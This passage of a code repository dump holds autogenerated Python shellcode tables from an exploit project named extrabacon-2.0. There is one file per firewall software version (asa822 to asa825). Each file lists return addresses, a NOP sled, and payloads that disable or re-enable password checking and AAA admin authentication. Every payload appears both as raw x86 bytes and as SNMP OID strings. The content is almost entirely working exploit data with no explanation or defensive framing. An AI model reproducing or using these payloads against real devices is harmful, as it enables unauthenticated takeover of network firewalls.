| payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\xd7\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.215.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = 
"\xeb\x14\xbf\x10\xd7\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.16.215.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa822.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa822" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x96\x36\x1c\x09" 11 | 12 | my_ret_addr_snmp = "150.54.28.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\xd9\xa5\x1d\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.217.165.29.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xaa\x1a\x84\x09\x50\xb8\x95\xee\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.170.26.132.9.80.184.149.238.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | 
launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xaa\x1a\x84\x09\x50\xb8\x95\xee\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.170.26.132.9.80.184.149.238.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x45\x8c\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x20\xe3\x29\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.69.140.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.32.227.41.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = 
"\xeb\x14\xbf\x20\xe3\x29\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x45\x8c\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.32.227.41.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.69.140.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x40\xdd\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.221.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x40\xdd\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.64.221.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa823.py: 
-------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa823" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x0d\xf6\x12\x09" 11 | 12 | my_ret_addr_snmp = "13.246.18.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x59\x8f\x1c\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.89.143.28.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x2e\xb0\x86\x09\x50\xb8\x25\xfa\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.46.176.134.9.80.184.37.250.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x2e\xb0\x86\x09\x50\xb8\x25\xfa\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = 
"144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.46.176.134.9.80.184.37.250.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\x8e\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x80\x6f\x2b\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.142.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.128.111.43.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x80\x6f\x2b\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xc5\x8e\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.128.111.43.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.197.142.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = 
"\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x90\xf1\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.144.241.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x90\xf1\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.144.241.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa824.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa824" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x5d\xac\x31\x09" 11 | 12 | my_ret_addr_snmp = "93.172.49.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = 
"\xb8\x49\xfe\x1c\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.73.254.28.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xce\x09\x87\x09\x50\xb8\x45\xfa\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.206.9.135.9.80.184.69.250.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xce\x09\x87\x09\x50\xb8\x45\xfa\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.206.9.135.9.80.184.69.250.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = 
"\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x15\x8e\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x60\xbb\x2b\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.21.142.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.96.187.43.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x60\xbb\x2b\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x15\x8e\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.96.187.43.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.21.142.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\xf2\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.242.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = 
"\xeb\x14\xbf\x10\xf2\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.16.242.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa825.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa825" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\xfd\x0d\x36\x09" 11 | 12 | my_ret_addr_snmp = "253.13.54.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x39\x40\x1c\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.57.64.28.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x2e\x14\x8c\x09\x50\xb8\xb5\xc5\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.46.20.140.9.80.184.181.197.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | 
launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x2e\x14\x8c\x09\x50\xb8\xb5\xc5\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.46.20.140.9.80.184.181.197.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\x95\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x60\x1c\x30\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.149.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.96.28.48.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = 
"\xeb\x14\xbf\x60\x1c\x30\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\x95\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.96.28.48.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.149.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x40\xf2\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.64.242.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x40\xf2\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.64.242.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa831.py: 
